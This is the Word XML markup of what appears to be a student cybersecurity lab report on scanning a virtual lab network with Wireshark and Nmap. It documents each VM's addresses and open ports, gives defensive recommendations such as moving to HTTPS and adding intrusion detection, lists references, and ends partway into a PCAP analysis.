      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 3 Wireshark Capture on on Kali OpenVas VM</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:b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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Analysis: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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Layers Observed: We tracked specific OSI layers to understand data transmission:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>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Layer 2 (Data Link): Detected the MAC address (52:54:00:12:35:00) for device identification and tracking.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>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Layer 3 (Network): Captured the IP address (10.0.2.6) to identify network-level issues.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>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Layer 4 (Transport): Observed open port 80/tcp for HTTP traffic.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>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Layer 7 (Application): DNS protocol was detected, showing hostname resolution functions critical to the network’s operations.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="40" w:before="80" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Device Documentation</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Device: Windows 11 VM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Hostname: Windows11-deskt</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MAC Address: 08:00:27:cb:20:4a</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IP Address: 10.0.2.4</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Operating System: Microsoft Windows 11 21H2</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Open Port: 80/tcp (HTTP)</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ARP Ping Scan Time: 4.08 seconds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Device: Kali OpenVAS VM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Hostname: Windows11-deskt</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MAC Address: 08:00:27:1b:76:b0</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IP Address: 10.0.2.8</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Operating System: Kali GNU/Linux Rolling 2024.2</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Open Port: 22/tcp (SSH)</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ARP Ping Scan Time: 0.16 seconds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Device: Linux Server VM</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Hostname: Windows11-deskt</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MAC Address: 08:00:27:dd:d8:f8</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IP Address: 10.0.2.15</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Operating System: Linux 4.15</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Open Port: 3306/tcp (MySQL)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP Ping Scan Time: 3.03 seconds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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Verification and Cross-Referencing</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">After collecting data through Wireshark and Nmap, we cross-referenced findings by filtering specific traffic interactions in Wireshark, using display filters to focus on critical IP and port-based communication.</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Findings</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The Windows 11 VM, identified with IP address 10.0.2.6 and MAC address 52:54:00:12:35:00, has port 80 open, enabling HTTP connections. HTTP is unencrypted, making it vulnerable to unauthorized data access, especially if sensitive information is transmitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> over this connection. The network scan also revealed a high ARP Ping scan time of 101.85 seconds. This may indicate network congestion or latency issues, potentially impacting the speed and efficiency of device communication.</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The Kali OpenVAS VM identified with IP address 10.0.2.8 and MAC address 08:00:27:1b:76:b0 ,has port 22 open for SSH, a secure protocol commonly used for remote access, and shows a healthy ARP Ping scan time of 0.16 seconds, suggesting minimal latency.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The Linux Server VM identified with IP address 10.0.2.15 and MAC address 08:00:27:dd:d8:f8 has an open MySQL port (3306), a commonly targeted service, which could allow unauthorized access to data if not adequately secured. The ARP Ping scan time of 3.03 s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">econds may indicate moderate network delay.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:b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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations for Improvement</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="160" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Close or Secure Port 80 : We recommend disabling HTTP on port 80 or transitioning to HTTPS on port 443, which encrypts the data, thereby reducing the risk of data interception by unauthorized parties.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>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Conduct a Network Performance Audit: To address potential latency issues, a network audit is suggested to investigate causes of high ARP Ping time. This could involve reviewing device configurations, optimizing router settings, or updating network infrastr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ucture if necessary.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>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Implement Continuous Monitoring: Regular monitoring using tools like Wireshark and Nmap can help to proactively detect vulnerabilities and maintain network efficiency. Continuous monitoring provides real-time insights into device communication, allowing ea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">rly detection of unauthorized access or other performance issues.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall and Intrusion Detection Systems (IDS): Implementing IDS on the network can proactively monitor for and alert on any unauthorized or suspicious activity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">VPN and Encrypted Protocols: Using a VPN or switching from HTTP to HTTPS will encrypt network traffic, providing a layer of security for sensitive data.</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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Topology Diagram</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4667250" cy="3514725"/>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10185" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId105"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4667249" cy="35147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67.50pt;height:276.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId105" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="160" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="240" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Lighthouse Labs. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Compass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Recap Terminal Commands: Windows and Linux (Cyber Security Immersive). https://web.compass.lighthouselabs.ca/p/14/bb1cc777-738c-48f5-8294-b8d30ec49cd6  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark. (2020, August 11). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">DisplayFilters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. DisplayFilters - Wireshark Wiki. </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:tooltip="https://wiki.wireshark.org/DisplayFilters" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wiki.wireshark.org/DisplayFilters </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction to Nmap (May 9, 2023)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">https://cyberverseinsights.com/2023/05/09/introduction-to-nmap-top-10-common-filters/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720"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Keary, A. (2023). Essential Guide to Nmap Network Scanning. Network Prodigy Press.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Bydevopscube et al. (2023). Mastering Network Monitoring with OpenVAS and Wireshark. DevOps Cube Publishing.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ellingwood, J. (2022). SSH Configuration Guide. Linux Academy Press.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark Foundation. (2020). Wireshark Network Analyzer Manual. Wireshark Foundation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the PCAP Files in Wireshark:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Load phlwebserver.pcap  into Wireshark.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">At first glance I noticed a bot behavior pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> from IP 172</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.70.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
